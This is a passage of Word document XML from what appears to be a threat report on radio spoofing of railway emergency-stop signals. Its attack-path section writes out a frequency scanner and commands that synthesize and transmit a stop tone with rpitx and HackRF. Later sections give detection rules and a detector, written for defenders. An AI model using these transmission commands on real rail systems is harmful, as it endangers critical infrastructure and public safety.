        <w:t xml:space="preserve">: Treatment chemical depletion begins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60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Just-in-time logistics collapse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61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Fuel shortages impair response </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[57]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yjyhc1em4kfp" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Crisis (24+ hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Economic Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: $48 billion daily losses </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[58]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Public Order</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Panic buying and civil unrest </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[59]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Health Crisis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hospital supply chains fail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66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Military logistics compromised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4gfqrw1w675m" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i3xkenvm8zfq" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Target Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1595.002 - Active Scanning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6C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sze9o4y3c065" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Frequency Discovery Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python3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Railroad frequency scanner used in Poland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Educational reconstruction only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import subprocess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import numpy as np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Common railroad frequencies (MHz)</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rail_frequencies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151.475, 151.480, 151.485,  # European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160.215, 160.830, 161.100,  # US freight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160.245, 160.320, 160.920   # US passenger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def scan_frequency(freq):</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"""Scan for radio activity"""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cmd = f"rtl_power -f {freq}M:2M:25k -i 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result = subprocess.run(cmd, shell=True, capture_output=True)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return analyze_power(result.stdout)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def analyze_power(data):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"""Identify active channels"""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power_levels = np.fromstring(data, sep=',')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active = power_levels &gt; -60  # dBm threshold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return active.any()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Attackers found 151.48 MHz active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freq in rail_frequencies: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scan_frequency(freq):</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print(f"Active: {freq} MHz")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l1ja8gbhiyx" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Signal Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1040 - Network Sniffing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A0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dy8vwknva987" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Actual signal capture and analysis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Source: Polish investigation files [[64]](#ref64)</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Capture 10 seconds of radio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rtl_sdr -f 151.48M -s 240000 -n 2400000 rail_capture.iq</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Demodulate FM signal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rtl_fm -f 151.48M -M fm -s 24k -r 24k -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sox -t raw -r 24k -e signed -b 16 - emergency_stop.wav</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Analyze audio pattern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sox emergency_stop.wav -n spectrogram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Result: 3-second tone pattern identified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1sgh6w5skwq5" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0863 - Spoof Reporting Message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B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bzyqqahhyp2u" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transmission Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Warning: Illegal to execute against live systems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Poland attackers used this approach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Generate emergency stop signal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sox -n -r 48000 stop_signal.wav synth 3 sine 1000 sine 2000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Transmit on rail frequency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Using Raspberry Pi with rpitx (Poland method)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sudo rpitx -m FM -f 151480 stop_signal.wav</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Alternative: HackRF/USRP for longer range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hackrf_transfer -t stop_signal.iq -f 151480000 -s 2000000 -a 1 -x 40</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9tor6tx2hq6w" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Effect Amplification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0835 - Manipulate I/O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attackers maximized impact through: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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Timing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Late night/early morning for maximum confusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geography</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Multiple regions simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeated transmissions over 30 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Psychology</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Emergency stop triggers cascade of manual stops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sducu8cbfjre" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k0jquvvlou1" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>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T1595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RF spectrum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SDR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hyperlink w:anchor="ref67">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[67]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Resource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T1587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SDR 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Code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hyperlink w:anchor="ref68">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[68]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T0863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Spoof radio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Signal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hyperlink w:anchor="ref69">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[69]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T0835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Manipulate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Behavioral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Use legitimate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Protocol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Network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Spectrum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hyperlink w:anchor="ref73">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T0861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Signal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RF fingerprinting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Standard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T0833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Stop train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Service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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sndqbgt5igr3" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Radio-Specific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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RF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Jamming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T0863.001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Block legitimate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T0863.002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Repeat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Unauthorized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T0863.003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False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Safety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T0863.004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Fake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Trust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m46ih0anhebs" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000234">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5cbnzp1ecgbd" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n8z5p2a9xeq5" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RF Spectrum Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: Unauthorized Railroad Radio Transmission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Reference: [[81]](#ref81)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title: Anomalous VHF Railroad Frequency Activity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id: b8d4f3a1-5c6e-4a7b-9d8f-2e3c4f5g6h7i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status: production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description: Detects unauthorized transmissions on railroad frequencies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references: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https://www.fcc.gov/railroad-radio-service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logsource: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category: rf_monitoring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product: sdr_sensor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detection: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selection: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frequency|contains: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'151.4'  # European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'160.'   # US freight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'161.'   # US passenger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signal_characteristics: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power: '&gt;-50dBm'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duration: '&gt;2s'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modulation: 'FM'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filter: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authorized_callsign: null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condition: selection and not filter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falsepositives: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Maintenance operations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Emergency services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level: critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qyrurmukcelu" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audio Pattern Recognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Deploy at SDR monitoring stations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import numpy as np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from scipy.io import wavfile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import tensorflow as tf</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class EmergencyStopDetector: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def __init__(self):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self.model = tf.keras.models.load_model('rail_audio_classifier.h5')</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self.emergency_patterns = self.load_patterns()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def analyze_transmission(self, audio_file):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rate, data = wavfile.read(audio_file)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Extract features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mfcc = extract_mfcc(data, rate)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spectral = extract_spectral_features(data, rate)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Classify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prediction = self.model.predict([mfcc, spectral])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if prediction &gt; 0.95:  # High confidence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alert_type = self.identify_command(data)</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self.trigger_alert(alert_type, audio_file)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def identify_command(self, audio_data):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Compare against known emergency patterns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for pattern_name, pattern_data in self.emergency_patterns.items():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if correlate(audio_data, pattern_data) &gt; 0.9:</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return pattern_name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return "unknown_command"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wyj571ib9dtk" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uehchq2umubz" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-30 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate spectrum monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at all major rail corridors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2AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy direction-finding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
